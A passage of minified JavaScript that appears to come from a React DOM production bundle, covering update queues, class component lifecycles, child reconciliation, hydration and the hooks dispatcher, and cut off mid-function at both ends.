p=s,c=p.next;p.next=null,null===l?i=c:l.next=c,l=p;var d=e.alternate;if(null!==d){var u=(d=d.updateQueue).lastBaseUpdate;u!==l&&(null===u?d.firstBaseUpdate=c:u.next=c,d.lastBaseUpdate=p)}}if(null!==i){for(u=o.baseState,l=0,d=c=p=null;;){s=i.lane;var m=i.eventTime;if((a&s)===s){null!==d&&(d=d.next={eventTime:m,lane:0,tag:i.tag,payload:i.payload,callback:i.callback,next:null});e:{var f=e,h=i;switch(s=t,m=n,h.tag){case 1:if("function"==typeof(f=h.payload)){u=f.call(m,u,s);break e}u=f;break e;case 3:f.flags=-4097&f.flags|64;case 0:if(null==(s="function"==typeof(f=h.payload)?f.call(m,u,s):f))break e;u=r({},u,s);break e;case 2:lo=!0}}null!==i.callback&&(e.flags|=32,null===(s=o.effects)?o.effects=[i]:s.push(i))}else m={eventTime:m,lane:s,tag:i.tag,payload:i.payload,callback:i.callback,next:null},null===d?(c=d=m,p=u):d=d.next=m,l|=s;if(null===(i=i.next)){if(null===(s=o.shared.pending))break;i=s.next,s.next=null,o.lastBaseUpdate=s,o.shared.pending=null}}null===d&&(p=u),o.baseState=p,o.firstBaseUpdate=c,o.lastBaseUpdate=d,Vl|=l,e.lanes=l,e.memoizedState=u}}function ho(e,t,n){if(e=t.effects,t.effects=null,null!==e)for(t=0;t<e.length;t++){var a=e[t],r=a.callback;if(null!==r){if(a.callback=null,a=n,"function"!=typeof r)throw Error(i(191,r));r.call(a)}}}var go=(new a.Component).refs;function vo(e,t,n,a){n=null==(n=n(a,t=e.memoizedState))?t:r({},t,n),e.memoizedState=n,0===e.lanes&&(e.updateQueue.baseState=n)}var _o={isMounted:function(e){return!!(e=e._reactInternals)&&Ke(e)===e},enqueueSetState:function(e,t,n){e=e._reactInternals;var a=ds(),r=us(e),o=co(a,r);o.payload=t,null!=n&&(o.callback=n),uo(e,o),ms(e,r,a)},enqueueReplaceState:function(e,t,n){e=e._reactInternals;var a=ds(),r=us(e),o=co(a,r);o.tag=1,o.payload=t,null!=n&&(o.callback=n),uo(e,o),ms(e,r,a)},enqueueForceUpdate:function(e,t){e=e._reactInternals;var n=ds(),a=us(e),r=co(n,a);r.tag=2,null!=t&&(r.callback=t),uo(e,r),ms(e,a,n)}};function wo(e,t,n,a,r,o,i){return"function"==typeof(e=e.stateNode).shouldComponentUpdate?e.shouldComponentUpdate(a,o,i):!(t.prototype&&t.prototype.isPureReactComponent&&ua(n,a)&&ua(r,o))}function bo(e,t,n){var a=!1,r=ur,o=t.contextType;return"object"==typeof o&&null!==o?o=io(o):(r=vr(t)?hr:mr.current,o=(a=null!=(a=t.contextTypes))?gr(e,r):ur),t=new t(n,o),e.memoizedState=null!==t.state&&void 0!==t.state?t.state:null,t.updater=_o,e.stateNode=t,t._reactInternals=e,a&&((e=e.stateNode).__reactInternalMemoizedUnmaskedChildContext=r,e.__reactInternalMemoizedMaskedChildContext=o),t}function xo(e,t,n,a){e=t.state,"function"==typeof t.componentWillReceiveProps&&t.componentWillReceiveProps(n,a),"function"==typeof t.UNSAFE_componentWillReceiveProps&&t.UNSAFE_componentWillReceiveProps(n,a),t.state!==e&&_o.enqueueReplaceState(t,t.state,null)}function yo(e,t,n,a){var r=e.stateNode;r.props=n,r.state=e.memoizedState,r.refs=go,so(e);var o=t.contextType;"object"==typeof o&&null!==o?r.context=io(o):(o=vr(t)?hr:mr.current,r.context=gr(e,o)),fo(e,n,r,a),r.state=e.memoizedState,"function"==typeof(o=t.getDerivedStateFromProps)&&(vo(e,t,o,n),r.state=e.memoizedState),"function"==typeof t.getDerivedStateFromProps||"function"==typeof r.getSnapshotBeforeUpdate||"function"!=typeof r.UNSAFE_componentWillMount&&"function"!=typeof r.componentWillMount||(t=r.state,"function"==typeof r.componentWillMount&&r.componentWillMount(),"function"==typeof r.UNSAFE_componentWillMount&&r.UNSAFE_componentWillMount(),t!==r.state&&_o.enqueueReplaceState(r,r.state,null),fo(e,n,r,a),r.state=e.memoizedState),"function"==typeof r.componentDidMount&&(e.flags|=4)}var ko=Array.isArray;function Eo(e,t,n){if(null!==(e=n.ref)&&"function"!=typeof e&&"object"!=typeof e){if(n._owner){if(n=n._owner){if(1!==n.tag)throw Error(i(309));var a=n.stateNode}if(!a)throw Error(i(147,e));var r=""+e;return null!==t&&null!==t.ref&&"function"==typeof t.ref&&t.ref._stringRef===r?t.ref:(t=function(e){var t=a.refs;t===go&&(t=a.refs={}),null===e?delete t[r]:t[r]=e},t._stringRef=r,t)}if("string"!=typeof e)throw Error(i(284));if(!n._owner)throw Error(i(290,e))}return e}function Co(e,t){if("textarea"!==e.type)throw Error(i(31,"[object Object]"===Object.prototype.toString.call(t)?"object with keys {"+Object.keys(t).join(", ")+"}":t))}function So(e){function t(t,n){if(e){var a=t.lastEffect;null!==a?(a.nextEffect=n,t.lastEffect=n):t.firstEffect=t.lastEffect=n,n.nextEffect=null,n.flags=8}}function n(n,a){if(!e)return null;for(;null!==a;)t(n,a),a=a.sibling;return null}function a(e,t){for(e=new Map;null!==t;)null!==t.key?e.set(t.key,t):e.set(t.index,t),t=t.sibling;return e}function r(e,t){return(e=Us(e,t)).index=0,e.sibling=null,e}function o(t,n,a){return t.index=a,e?null!==(a=t.alternate)?(a=a.index)<n?(t.flags=2,n):a:(t.flags=2,n):n}function l(t){return e&&null===t.alternate&&(t.flags=2),t}function s(e,t,n,a){return null===t||6!==t.tag?((t=Ks(n,e.mode,a)).return=e,t):((t=r(t,n)).return=e,t)}function p(e,t,n,a){return null!==t&&t.elementType===n.type?((a=r(t,n.props)).ref=Eo(e,t,n),a.return=e,a):((a=$s(n.type,n.key,n.props,null,e.mode,a)).ref=Eo(e,t,n),a.return=e,a)}function c(e,t,n,a){return null===t||4!==t.tag||t.stateNode.containerInfo!==n.containerInfo||t.stateNode.implementation!==n.implementation?((t=Xs(n,e.mode,a)).return=e,t):((t=r(t,n.children||[])).return=e,t)}function d(e,t,n,a,o){return null===t||7!==t.tag?((t=Gs(n,e.mode,a,o)).return=e,t):((t=r(t,n)).return=e,t)}function u(e,t,n){if("string"==typeof t||"number"==typeof t)return(t=Ks(""+t,e.mode,n)).return=e,t;if("object"==typeof t&&null!==t){switch(t.$$typeof){case y:return(n=$s(t.type,t.key,t.props,null,e.mode,n)).ref=Eo(e,null,t),n.return=e,n;case k:return(t=Xs(t,e.mode,n)).return=e,t}if(ko(t)||W(t))return(t=Gs(t,e.mode,n,null)).return=e,t;Co(e,t)}return null}function m(e,t,n,a){var r=null!==t?t.key:null;if("string"==typeof n||"number"==typeof n)return null!==r?null:s(e,t,""+n,a);if("object"==typeof n&&null!==n){switch(n.$$typeof){case y:return n.key===r?n.type===E?d(e,t,n.props.children,a,r):p(e,t,n,a):null;case k:return n.key===r?c(e,t,n,a):null}if(ko(n)||W(n))return null!==r?null:d(e,t,n,a,null);Co(e,n)}return null}function f(e,t,n,a,r){if("string"==typeof a||"number"==typeof a)return s(t,e=e.get(n)||null,""+a,r);if("object"==typeof a&&null!==a){switch(a.$$typeof){case y:return e=e.get(null===a.key?n:a.key)||null,a.type===E?d(t,e,a.props.children,r,a.key):p(t,e,a,r);case k:return c(t,e=e.get(null===a.key?n:a.key)||null,a,r)}if(ko(a)||W(a))return d(t,e=e.get(n)||null,a,r,null);Co(t,a)}return null}function h(r,i,l,s){for(var p=null,c=null,d=i,h=i=0,g=null;null!==d&&h<l.length;h++){d.index>h?(g=d,d=null):g=d.sibling;var v=m(r,d,l[h],s);if(null===v){null===d&&(d=g);break}e&&d&&null===v.alternate&&t(r,d),i=o(v,i,h),null===c?p=v:c.sibling=v,c=v,d=g}if(h===l.length)return n(r,d),p;if(null===d){for(;h<l.length;h++)null!==(d=u(r,l[h],s))&&(i=o(d,i,h),null===c?p=d:c.sibling=d,c=d);return p}for(d=a(r,d);h<l.length;h++)null!==(g=f(d,r,h,l[h],s))&&(e&&null!==g.alternate&&d.delete(null===g.key?h:g.key),i=o(g,i,h),null===c?p=g:c.sibling=g,c=g);return e&&d.forEach((function(e){return t(r,e)})),p}function g(r,l,s,p){var c=W(s);if("function"!=typeof c)throw Error(i(150));if(null==(s=c.call(s)))throw Error(i(151));for(var d=c=null,h=l,g=l=0,v=null,_=s.next();null!==h&&!_.done;g++,_=s.next()){h.index>g?(v=h,h=null):v=h.sibling;var w=m(r,h,_.value,p);if(null===w){null===h&&(h=v);break}e&&h&&null===w.alternate&&t(r,h),l=o(w,l,g),null===d?c=w:d.sibling=w,d=w,h=v}if(_.done)return n(r,h),c;if(null===h){for(;!_.done;g++,_=s.next())null!==(_=u(r,_.value,p))&&(l=o(_,l,g),null===d?c=_:d.sibling=_,d=_);return c}for(h=a(r,h);!_.done;g++,_=s.next())null!==(_=f(h,r,g,_.value,p))&&(e&&null!==_.alternate&&h.delete(null===_.key?g:_.key),l=o(_,l,g),null===d?c=_:d.sibling=_,d=_);return e&&h.forEach((function(e){return t(r,e)})),c}return function(e,a,o,s){var p="object"==typeof o&&null!==o&&o.type===E&&null===o.key;p&&(o=o.props.children);var c="object"==typeof o&&null!==o;if(c)switch(o.$$typeof){case y:e:{for(c=o.key,p=a;null!==p;){if(p.key===c){if(7===p.tag){if(o.type===E){n(e,p.sibling),(a=r(p,o.props.children)).return=e,e=a;break e}}else if(p.elementType===o.type){n(e,p.sibling),(a=r(p,o.props)).ref=Eo(e,p,o),a.return=e,e=a;break e}n(e,p);break}t(e,p),p=p.sibling}o.type===E?((a=Gs(o.props.children,e.mode,s,o.key)).return=e,e=a):((s=$s(o.type,o.key,o.props,null,e.mode,s)).ref=Eo(e,a,o),s.return=e,e=s)}return l(e);case k:e:{for(p=o.key;null!==a;){if(a.key===p){if(4===a.tag&&a.stateNode.containerInfo===o.containerInfo&&a.stateNode.implementation===o.implementation){n(e,a.sibling),(a=r(a,o.children||[])).return=e,e=a;break e}n(e,a);break}t(e,a),a=a.sibling}(a=Xs(o,e.mode,s)).return=e,e=a}return l(e)}if("string"==typeof o||"number"==typeof o)return o=""+o,null!==a&&6===a.tag?(n(e,a.sibling),(a=r(a,o)).return=e,e=a):(n(e,a),(a=Ks(o,e.mode,s)).return=e,e=a),l(e);if(ko(o))return h(e,a,o,s);if(W(o))return g(e,a,o,s);if(c&&Co(e,o),void 0===o&&!p)switch(e.tag){case 1:case 22:case 0:case 11:case 15:throw Error(i(152,G(e.type)||"Component"))}return n(e,a)}}var Mo=So(!0),Lo=So(!1),No={},Zo=pr(No),Po=pr(No),zo=pr(No);function Ao(e){if(e===No)throw Error(i(174));return e}function Bo(e,t){switch(dr(zo,t),dr(Po,e),dr(Zo,No),e=t.nodeType){case 9:case 11:t=(t=t.documentElement)?t.namespaceURI:me(null,"");break;default:t=me(t=(e=8===e?t.parentNode:t).namespaceURI||null,e=e.tagName)}cr(Zo),dr(Zo,t)}function Ho(){cr(Zo),cr(Po),cr(zo)}function To(e){Ao(zo.current);var t=Ao(Zo.current),n=me(t,e.type);t!==n&&(dr(Po,e),dr(Zo,n))}function Ro(e){Po.current===e&&(cr(Zo),cr(Po))}var Oo=pr(0);function jo(e){for(var t=e;null!==t;){if(13===t.tag){var n=t.memoizedState;if(null!==n&&(null===(n=n.dehydrated)||"$?"===n.data||"$!"===n.data))return t}else if(19===t.tag&&void 0!==t.memoizedProps.revealOrder){if(0!=(64&t.flags))return t}else if(null!==t.child){t.child.return=t,t=t.child;continue}if(t===e)break;for(;null===t.sibling;){if(null===t.return||t.return===e)return null;t=t.return}t.sibling.return=t.return,t=t.sibling}return null}var Vo=null,Fo=null,Wo=!1;function Do(e,t){var n=Ds(5,null,null,0);n.elementType="DELETED",n.type="DELETED",n.stateNode=t,n.return=e,n.flags=8,null!==e.lastEffect?(e.lastEffect.nextEffect=n,e.lastEffect=n):e.firstEffect=e.lastEffect=n}function Io(e,t){switch(e.tag){case 5:var n=e.type;return null!==(t=1!==t.nodeType||n.toLowerCase()!==t.nodeName.toLowerCase()?null:t)&&(e.stateNode=t,!0);case 6:return null!==(t=""===e.pendingProps||3!==t.nodeType?null:t)&&(e.stateNode=t,!0);default:return!1}}function Uo(e){if(Wo){var t=Fo;if(t){var n=t;if(!Io(e,t)){if(!(t=qa(n.nextSibling))||!Io(e,t))return e.flags=-1025&e.flags|2,Wo=!1,void(Vo=e);Do(Vo,n)}Vo=e,Fo=qa(t.firstChild)}else e.flags=-1025&e.flags|2,Wo=!1,Vo=e}}function $o(e){for(e=e.return;null!==e&&5!==e.tag&&3!==e.tag&&13!==e.tag;)e=e.return;Vo=e}function Go(e){if(e!==Vo)return!1;if(!Wo)return $o(e),Wo=!0,!1;var t=e.type;if(5!==e.tag||"head"!==t&&"body"!==t&&!Ia(t,e.memoizedProps))for(t=Fo;t;)Do(e,t),t=qa(t.nextSibling);if($o(e),13===e.tag){if(!(e=null!==(e=e.memoizedState)?e.dehydrated:null))throw Error(i(317));e:{for(e=e.nextSibling,t=0;e;){if(8===e.nodeType){var n=e.data;if("/$"===n){if(0===t){Fo=qa(e.nextSibling);break e}t--}else"$"!==n&&"$!"!==n&&"$?"!==n||t++}e=e.nextSibling}Fo=null}}else Fo=Vo?qa(e.stateNode.nextSibling):null;return!0}function qo(){Fo=Vo=null,Wo=!1}var Ko=[];function Xo(){for(var e=0;e<Ko.length;e++)Ko[e]._workInProgressVersionPrimary=null;Ko.length=0}var Qo=x.ReactCurrentDispatcher,Jo=x.ReactCurrentBatchConfig,Yo=0,ei=null,ti=null,ni=null,ai=!1,ri=!1;function oi(){throw Error(i(321))}function ii(e,t){if(null===t)return!1;for(var n=0;n<t.length&&n<e.length;n++)if(!ca(e[n],t[n]))return!1;return!0}function li(e,t,n,a,r,o){if(Yo=o,ei=t,t.memoizedState=null,t.updateQueue=null,t.lanes=0,Qo.current=null===e||null===e.memoizedState?Ai:Bi,e=n(a,r),ri){o=0;do{if(ri=!1,!(25>o))throw Error(i(301));o+=1,ni=ti=null,t.updateQueue=null,Qo.current=Hi,e=n(a,r)}while(ri)}if(Qo.current=zi,t=null!==ti&&null!==ti.next,Yo=0,ni=ti=ei=null,ai=!1,t)throw Error(i(300));return e}function si(){var e={memoizedState:null,baseState:null,baseQueue:null,queue:null,next:null};return null===ni?ei.memoizedState=ni=e:ni=ni.next=e,ni}function pi(){if(null===ti){var e=ei.alternate;e=null!==e?e.memoizedState:null}else e=ti.next;var t=null===ni?ei.memoizedState:ni.next;if(null!==t)ni=t,ti=e;else{if(null===e)throw Error(i(310));e={memoizedState:(ti=e).memoizedState,baseState:ti.baseState,baseQueue:ti.baseQueue,queue:ti.queue,next:null},null===ni?ei.memoizedState=ni=e:ni=ni.next=e}return ni}function ci(e,t){return"function"==typeof t?t(e):t}function di(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=ti,r=a.baseQueue,o=n.pending;if(null!==o){if(null!==r){var l=r.next;r.next=o.next,o.next=l}a.baseQueue=r=o,n.pending=null}if(null!==r){r=r.next,a=a.baseState;var s=l=o=null,p=r;do{var c=p.lane;if((Yo&c)===c)null!==s&&(s=s.next={lane:0,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null}),a=p.eagerReducer===e?p.eagerState:e(a,p.action);else{var d={lane:c,action:p.action,eagerReducer:p.eagerReducer,eagerState:p.eagerState,next:null};null===s?(l=s=d,o=a):s=s.next=d,ei.lanes|=c,Vl|=c}p=p.next}while(null!==p&&p!==r);null===s?o=a:s.next=l,ca(a,t.memoizedState)||(Ri=!0),t.memoizedState=a,t.baseState=o,t.baseQueue=s,n.lastRenderedState=a}return[t.memoizedState,n.dispatch]}function ui(e){var t=pi(),n=t.queue;if(null===n)throw Error(i(311));n.lastRenderedReducer=e;var a=n.dispatch,r=n.pending,o=t.memoizedState;if(null!==r){n.pending=null;var l=r=r.next;do{o=e(o,l.action),l=l.next}while(l!==r);ca(o,t.memoizedState)||(Ri=!0),t.memoizedState=o,null===t.baseQueue&&(t.baseState=o),n.lastRenderedState=o}return[o,a]}function mi(e,t,n){var a=t._getVersion;a=a(t._source);var r=t._workInProgressVersionPrimary;if(null!==r?e=r===a:(e=e.mutableReadLanes,(e=(Yo&e)===e)&&(t._workInProgressVersionPrimary=a,Ko.push(t))),e)return n(t._source);throw Ko.push(t),Error(i(350))}function fi(e,t,n,a){var r=zl;if(null===r)throw Error(i(349));var o=t._getVersion,l=o(t._source),s=Qo.current,p=s.useState((function(){return mi(r,t,n)})),c=p[1],d=p[0];p=ni;var u=e.memoizedState,m=u.refs,f=m.getSnapshot,h=u.source;u=u.subscribe;var g=ei;return e.memoizedState={refs:m,source:t,subscribe:a},s.useEffect((function(){m.getSnapshot=n,m.setSnapshot=c;var e=o(t._source);if(!ca(l,e)){e=n(t._source),ca(d,e)||(c(e),e=us(g),r.mutableReadLanes|=e&r.pendingLanes),e=r.mutableReadLanes,r.entangledLanes|=e;for(var a=r.entanglements,i=e;0<i;){var s=31-Dt(i),p=1<<s;a[s]|=e,i&=~p}}}),[n,t,a]),s.useEffect((function(){return a(t._source,(function(){var e=m.getSnapshot,n=m.setSnapshot;try{n(e(t._source));var a=us(g);r.mutableReadLanes|=a&r.pendingLanes}catch(e){n((function(){throw e}))}}))}),[t,a]),ca(f,n)&&ca(h,t)&&ca(u,a)||((e={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:d}).dispatch=c=Pi.bind(null,ei,e),p.queue=e,p.baseQueue=null,d=mi(r,t,n),p.memoizedState=p.baseState=d),d}function hi(e,t,n){return fi(pi(),e,t,n)}function gi(e){var t=si();return"function"==typeof e&&(e=e()),t.memoizedState=t.baseState=e,e=(e=t.queue={pending:null,dispatch:null,lastRenderedReducer:ci,lastRenderedState:e}).dispatch=Pi.bind(null,ei,e),[t.memoizedState,e]}function vi(e,t,n,a){return e={tag:e,create:t,destroy:n,deps:a,next:null},null===(t=ei.updateQueue)?(t={lastEffect:null},ei.updateQueue=t,t.lastEffect=e.next=e):null===(n=t.lastEffect)?t.lastEffect=e.next=e:(a=n.next,n.next=e,e.next=a,t.lastEffect=e),e}function _i(e){return e={current:e},si().memoizedState=e}function wi(){return pi().memoizedState}function bi(e,t,n,a){var r=si();ei.flags|=e,r.memoizedState=vi(1|t,n,void 0,void 0===a?null:a)}function xi(e,t,n,a){var r=pi();a=void 0===a?null:a;var o=void 0;if(null!==ti){var i=ti.memoizedState;if(o=i.destroy,null!==a&&ii(a,i.deps))return void vi(t,n,o,a)}ei.flags|=e,r.memoizedState=vi(1|t,n,o,a)}function yi(e,t){return bi(516,4,e,t)}function ki(e,t){return xi(516,4,e,t)}function Ei(e,t){return xi(4,2,e,t)}function Ci(e,t){return"function"==typeof t?(e=e(),t(e),function(){t(null)}):null!=t?(e=e(),t.current=e,function(){t.current=null}):void 0}function Si(e,t,n){return n=null!=n?n.concat([e]):null,xi(4,2,Ci.bind(null,t,e),n)}function Mi(){}function Li(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(n.memoizedState=[e,t],e)}function Ni(e,t){var n=pi();t=void 0===t?null:t;var a=n.memoizedState;return null!==a&&null!==t&&ii(t,a[1])?a[0]:(e=e(),n.memoizedState=[e,t],e)}function Zi(e,t){var n=Ir();$r(98>n?98:n,(function(){e(!0)})),$r(97<n?97:n,(function(){var n=Jo.transition;Jo.transition=1;try{e(!1),t()}finally{Jo.transition=n}}))}function Pi(e,t,n){var a=ds(),r=us(e),o={lane:r,action:n,eagerReducer:null,eagerState:null,next:null},i=t.pending;if(null===i?o.next=o:(o.next=i.next,i.next=o),t.pending=o,i=e.alternate,e===ei||null!==i&&i===ei)ri=ai=!0;else{if(0===e.lanes&&(null===i||0===i.lanes)&&null!==(i=t.lastRenderedReducer))try{var l=t.lastRenderedState,s=i(l,n);if(o.eagerReducer=i,o.eagerState=s,ca(s,l))return}catch(e){}ms(e,r,a)}}var zi={readContext:io,useCallback:oi,useContext:oi,useEffect:oi,useImperativeHandle:oi,useLayoutEffect:oi,useMemo:oi,useReducer:oi,useRef:oi,useState:oi,useDebugValue:oi,useDeferredValue:oi,useTransition:oi,useMutableSource:oi,useOpaqueIdentifier:oi,unstable_isNewReconciler:!1},Ai={readContext:io,useCallback:function(e,t){return si().memoizedState=[e,void 0===t?null:t],e},useContext:io,useEffect:yi,useImperativeHandle:function(e,t,n){return n=null!=n?n.concat([e]):null,bi(4,2,Ci.bind(null,t,e),n)},useLayoutEffect:function(e,t){return bi(4,2,e,t)},useMemo:function(e,t){var n=si();return t=void 0===t?null:t,e=e(),n.memoizedState=[e,t],e},useReducer:function(e,t,n){var a=si();return t=void 0!==n?n(t):t,a.memoizedState=a.baseState=t,e=(e=a.queue={pending:null,dispatch:null,lastRenderedReducer:e,lastRenderedState:t}).dispatch=Pi.bind(null,ei,e),[a.memoizedState,e]},useRef:_i,useState:gi,useDebugValue:Mi,useDeferredValue:function(e){var t=gi(e),n=t[0],a=t[1];return yi((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=gi(!1),t=e[0];return _i(e=Zi.bind(null,e[1])),[e,t]},useMutableSource:function(e,t,n){var a=si();return a.memoizedState={refs:{getSnapshot:t,setSnapshot:null},source:e,subscribe:n},fi(a,e,t,n)},useOpaqueIdentifier:function(){if(Wo){var e=!1,t=function(e){return{$$typeof:H,toString:e,valueOf:e}}((function(){throw e||(e=!0,n("r:"+(Xa++).toString(36))),Error(i(355))})),n=gi(t)[1];return 0==(2&ei.mode)&&(ei.flags|=516,vi(5,(function(){n("r:"+(Xa++).toString(36))}),void 0,null)),t}return gi(t="r:"+(Xa++).toString(36)),t},unstable_isNewReconciler:!1},Bi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:di,useRef:wi,useState:function(){return di(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=di(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=di(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return di(ci)[0]},unstable_isNewReconciler:!1},Hi={readContext:io,useCallback:Li,useContext:io,useEffect:ki,useImperativeHandle:Si,useLayoutEffect:Ei,useMemo:Ni,useReducer:ui,useRef:wi,useState:function(){return ui(ci)},useDebugValue:Mi,useDeferredValue:function(e){var t=ui(ci),n=t[0],a=t[1];return ki((function(){var t=Jo.transition;Jo.transition=1;try{a(e)}finally{Jo.transition=t}}),[e]),n},useTransition:function(){var e=ui(ci)[0];return[wi().current,e]},useMutableSource:hi,useOpaqueIdentifier:function(){return ui(ci)[0]},unstable_isNewReconciler:!1},Ti=x.ReactCurrentOwner,Ri=!1;function Oi(e,t,n,a){t.child=null===e?Lo(t,null,n,a):Mo(t,e.child,n,a)}function ji(e,t,n,a,r){n=n.render;var o=t.ref;return oo(t,r),a=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,a,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Vi(e,t,n,a,r,o){if(null===e){var i=n.type;return"function"!=typeof i||Is(i)||void 0!==i.defaultProps||null!==n.compare||void 0!==n.defaultProps?((e=$s(n.type,null,a,t,t.mode,o)).ref=t.ref,e.return=t,t.child=e):(t.tag=15,t.type=i,Fi(e,t,i,a,r,o))}return i=e.child,0==(r&o)&&(r=i.memoizedProps,(n=null!==(n=n.compare)?n:ua)(r,a)&&e.ref===t.ref)?rl(e,t,o):(t.flags|=1,(e=Us(i,a)).ref=t.ref,e.return=t,t.child=e)}function Fi(e,t,n,a,r,o){if(null!==e&&ua(e.memoizedProps,a)&&e.ref===t.ref){if(Ri=!1,0==(o&r))return t.lanes=e.lanes,rl(e,t,o);0!=(16384&e.flags)&&(Ri=!0)}return Ii(e,t,n,a,o)}function Wi(e,t,n){var a=t.pendingProps,r=a.children,o=null!==e?e.memoizedState:null;if("hidden"===a.mode||"unstable-defer-without-hiding"===a.mode)if(0==(4&t.mode))t.memoizedState={baseLanes:0},xs(0,n);else{if(0==(1073741824&n))return e=null!==o?o.baseLanes|n:n,t.lanes=t.childLanes=1073741824,t.memoizedState={baseLanes:e},xs(0,e),null;t.memoizedState={baseLanes:0},xs(0,null!==o?o.baseLanes:n)}else null!==o?(a=o.baseLanes|n,t.memoizedState=null):a=n,xs(0,a);return Oi(e,t,r,n),t.child}function Di(e,t){var n=t.ref;(null===e&&null!==n||null!==e&&e.ref!==n)&&(t.flags|=128)}function Ii(e,t,n,a,r){var o=vr(n)?hr:mr.current;return o=gr(t,o),oo(t,r),n=li(e,t,n,a,o,r),null===e||Ri?(t.flags|=1,Oi(e,t,n,r),t.child):(t.updateQueue=e.updateQueue,t.flags&=-517,e.lanes&=~r,rl(e,t,r))}function Ui(e,t,n,a,r){if(vr(n)){var o=!0;xr(t)}else o=!1;if(oo(t,r),null===t.stateNode)null!==e&&(e.alternate=null,t.alternate=null,t.flags|=2),bo(t,n,a),yo(t,n,a,r),a=!0;else if(null===e){var i=t.stateNode,l=t.memoizedProps;i.props=l;var s=i.context,p=n.contextType;p="object"==typeof p&&null!==p?io(p):gr(t,p=vr(n)?hr:mr.current);var c=n.getDerivedStateFromProps,d="function"==typeof c||"function"==typeof i.getSnapshotBeforeUpdate;d||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==a||s!==p)&&xo(t,i,a,p),lo=!1;var u=t.memoizedState;i.state=u,fo(t,a,i,r),s=t.memoizedState,l!==a||u!==s||fr.current||lo?("function"==typeof c&&(vo(t,n,c,a),s=t.memoizedState),(l=lo||wo(t,n,l,a,u,s,p))?(d||"function"!=typeof i.UNSAFE_componentWillMount&&"function"!=typeof i.componentWillMount||("function"==typeof i.componentWillMount&&i.componentWillMount(),"function"==typeof i.UNSAFE_componentWillMount&&i.UNSAFE_componentWillMount()),"function"==typeof i.componentDidMount&&(t.flags|=4)):("function"==typeof i.componentDidMount&&(t.flags|=4),t.memoizedProps=a,t.memoizedState=s),i.props=a,i.state=s,i.context=p,a=l):("function"==typeof i.componentDidMount&&(t.flags|=4),a=!1)}else{i=t.stateNode,po(e,t),l=t.memoizedProps,p=t.type===t.elementType?l:Qr(t.type,l),i.props=p,d=t.pendingProps,u=i.context,s="object"==typeof(s=n.contextType)&&null!==s?io(s):gr(t,s=vr(n)?hr:mr.current);var m=n.getDerivedStateFromProps;(c="function"==typeof m||"function"==typeof i.getSnapshotBeforeUpdate)||"function"!=typeof i.UNSAFE_componentWillReceiveProps&&"function"!=typeof i.componentWillReceiveProps||(l!==d||u!==s)&&xo(t,i,a,s),lo=!1,u=t.memoizedState,i.state=u,fo(t,a,i,r);var f=t.memoizedState;l!==d||u!==f||fr.current||lo?("function"==typeof m&&(vo(t,n,m,a),f=t.memoizedState),(p=lo||wo(t,n,p,a,u,f,s))?(c||"function"!=typeof i.UNSAFE_componentWillUpdate&&"function"!=typeof i.componentWillUpdate||("function"==typeof i.componentWillUpdate&&i.componentWillUpdate(a,f,s),"function"==typeof i.UNSAFE_componentWillUpdate&&i.UNSAFE_componentWillUpdate(a,f,s)),"function"==typeof i.componentDidUpdate&&(t.flags|=4),"function"==typeof i.getSnapshotBeforeUpdate&&(t.flags|=256)):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),t.memoizedProps=a,t.memoizedState=f),i.props=a,i.state=f,i.context=s,a=p):("function"!=typeof i.componentDidUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=4),"function"!=typeof i.getSnapshotBeforeUpdate||l===e.memoizedProps&&u===e.memoizedState||(t.flags|=256),a=!1)}return $i(e,t,n,a,o,r)}function $i(e,t,n,a,r,o){Di(e,t);var i=0!=(64&t.flags);if(!a&&!i)return r&&yr(t,n,!1),rl(e,t,o);a=t.stateNode,Ti.current=t;var l=i&&"function"!=typeof n.getDerivedStateFromError?null:a.render();return t.flags|=1,null!==e&&i?(t.child=Mo(t,e.child,null,o),t.child=Mo(t,null,l,o)):Oi(e,t,l,o),t.memoizedState=a.state,r&&yr(t,n,!0),t.child}function Gi(e){var t=e.stateNode;t.pendingContext?wr(0,t.pendingContext,t.pendingContext!==t.context):t.context&&wr(0,t.context,!1),Bo(e,t.containerInfo)}var qi,Ki,Xi,Qi,Ji={dehydrated:null,retryLane:0};function Yi(e,t,n){var a,r=t.pendingProps,o=Oo.current,i=!1;return(a=0!=(64&t.flags))||(a=(null===e||null!==e.memoizedState)&&0!=(2&o)),a?(i=!0,t.flags&=-65):null!==e&&null===e.memoizedState||void 0===r.fallback||!0===r.unstable_avoidThisFallback||(o|=1),dr(Oo,1&o),null===e?(void 0!==r.fallback&&Uo(t),e=r.children,o=r.fallback,i?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,e):"number"==typeof r.unstable_expectedLoadTime?(e=el(t,e,o,n),t.child.memoizedState={baseLanes:n},t.memoizedState=Ji,t.lanes=33554432,e):((n=qs({mode:"visible",children:e},t.mode,n,null)).return=t,t.child=n)):(e.memoizedState,i?(r=function(e,t,n,a,r){var o=t.mode,i=e.child;e=i.sibling;var l={mode:"hidden",children:n};return 